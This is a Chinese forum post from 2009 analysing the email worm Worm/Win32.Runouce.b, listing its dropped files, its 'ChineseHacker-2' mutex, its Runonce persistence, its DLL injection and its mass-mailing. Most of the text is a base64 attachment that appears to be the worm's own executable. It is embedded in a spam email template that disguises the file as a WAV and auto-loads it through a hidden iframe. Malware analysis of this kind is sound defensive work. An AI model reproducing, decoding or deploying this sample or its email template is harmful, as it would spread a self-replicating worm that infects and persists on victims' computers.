flyleaf 发表于 2009-4-9 11:13

Worm/Win32.Runouce.b[Email]分析

一、 病毒标签:
病毒名称: Worm/Win32.Runouce.b
病毒类型: 蠕虫
文件 MD5: 5BCD5AC1E81E9AD7D75B031DA6DF401B
公开范围: 完全公开
危害等级: 4
文件长度: 126,976 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual Basic 5.0 / 6.0

二、 病毒描述:
该恶意文件为蠕虫病毒,本恶意病毒文件进行了加密处理,病毒运行后、暴力搜索kernel32基址,动态获取大量API函数地址,创建互斥量名为“ChineseHacker-2”,防止多次运行产生的冲突,调用API函数隐藏打开病毒本体文件,创建病毒文件“runouce.exe、KillEDLL.DLL”到%system32%目录下,按节分别将病毒代码写入该文件中,试图将病毒DLL注入到所有进程中,并将属性设置为隐藏,添加注册表启动项、创建一个注册表监视的线程,如被删除,则立即重新写入病毒启动项,在系统目录下衍生“readme.eml”文件,该文件为病毒发送的邮件内容,该邮件内容为了躲避安全软件查杀便做了Base64加密处理,解密后得到的数据为PE文件可执行文件(病毒体文件),病毒调用系统自带的Outlook Express发送恶意邮件,病毒利用发送恶意邮件来传播自身。

三、 行为分析:
本地行为:
1、文件运行后会释放以下文件
%System32%\KillEDLL.DLL
%System32%\MSWBPROTECT.DLL
%System32%\runouce.exe
%Program Files%\Common Files\Microsoft Shared\Stationery\readme.eml
%Program Files%\Common Files\System\ado\readme.eml
%Program Files%\NetMeeting\readme.eml

2、本恶意病毒文件进行了加密处理,病毒运行后、暴力搜索kernel32基址,动态获取大量API函数地址,调用API函数CreateMutexA创建互斥量名为“ChineseHacker-2”,防止多次运行产生的冲突

3、添加注册表启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runonce
值: 字符串: "C:\WINDOWS\system32\runouce.exe"
描述:添加注册表启动项

4、调用API函数隐藏打开病毒本体文件,创建病毒文件“runouce.exe”到%system32%目录下,按节分别将病毒代码写入该文件中,并将属性设置为隐藏,添加注册表启动项、创建一个注册表监视的线程,如被删除,则立即重新写入病毒启动项

5、在系统目录下衍生“readme.eml”文件,该文件为病毒发送的邮件内容,该邮件内容为了躲避安全软件查杀便做了Base64加密处理,解密后得到的数据为PE文件可执行文件(病毒体文件),病毒调用系统自带的Outlook Express发送恶意邮件

网络行为:
协议:TCP
端口:139 445
描述:通过以上端口发送恶意邮件,邮件内容为:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: A-738DF22C9CA04@yahoo.com
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAAAEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgwAAAAAAAAAAAAADgwAAAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGMAAAAAAAAEYwAAAAAAAAS0VSTkVMMzIuZGxsAAAAAFNsZWVwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAwAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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YW1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdGVtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAARmluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDaGFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvMwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3Bl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